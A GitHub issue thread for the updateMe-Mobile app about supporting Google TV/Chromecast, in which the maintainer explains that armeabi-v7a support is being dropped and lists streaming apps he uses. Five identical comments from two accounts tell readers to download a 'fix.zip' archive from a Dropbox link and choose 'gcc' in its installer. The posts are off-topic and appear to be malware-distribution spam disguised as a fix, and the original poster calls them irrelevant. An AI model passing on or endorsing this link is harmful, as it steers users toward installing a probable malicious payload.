### ISSUE TITLE
Update-me on google tv/chromecast?

### ISSUE THREAD

**Issue by HyrulianZer0** [anfreire/updateMe-Mobile#32]
With the help of downloader, people can go search for it or use a short code ( not short link ) to find you app ... Once there you can install it

Not much games for google tv/Chromecast ... So maybe the focus should be for just apps, video players, music players ... Im trying to list what i use ...

If you dont have a google tv ( recommend getting one so you can experiment with it in house ) they are less than $100, in america ... Dont know where you are ... Though if you find one, get it, dont matter the format

For your consideration
-Zer0

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by HyrulianZer0** [comment]
Yeah ... I dont know about that ... And its not relevant to my suggestion

**Comment by HyrulianZer0** [comment]
Alright, keep me posted ... Should be easy ... In theory

And i think ( since ive tried a few apks for google tv ) that you are looking for ARM7 ... If that is right ... That WILL be key for development

**Comment by Felitendo** [comment]
> Alright, keep me posted ... Should be easy ... In theory
> 
> And i think ( since ive tried a few apks for google tv ) that you are looking for ARM7 ... If that is right ... That WILL be key for development

You have an Android TV right? Why not try if it works on Android TV

**Comment by HyrulianZer0** [comment]
No apps within update me for any interest ... At the moment, the dev would have to create a repo/library of apps ... If any

**Comment by anfreire** [comment]
Thank you for your detailed feedback and suggestions. I appreciate your insights about Google TV/Chromecast apps.

Regarding architecture support, I want to inform you that I'll be removing armeabi-v7a support in the upcoming release. It's becoming quite challenging to maintain the apps repository for both arm64-v8a and armeabi-v7a. Given that most modern Android devices now use arm64-v8a, the extra effort required for armeabi-v7a support isn't sustainable for the project at this time.

I do have an Android TV box, and I've found that many modded apps I use don't require frequent updates, or they update themselves. Here are some apps I currently use on my TV:

1. SmartTube (for YouTube)
2. HDO TV (for movies and TV shows)
3. Stremio (for movies and TV shows)
4. OnStream (for movies and TV shows)

Speaking of Stremio, I'm planning to implement a tutorial to guide users on finding add-ons and share my recommendations.

**Comment by HyrulianZer0** [comment]
Already use smart tube, tell me more about streamio?
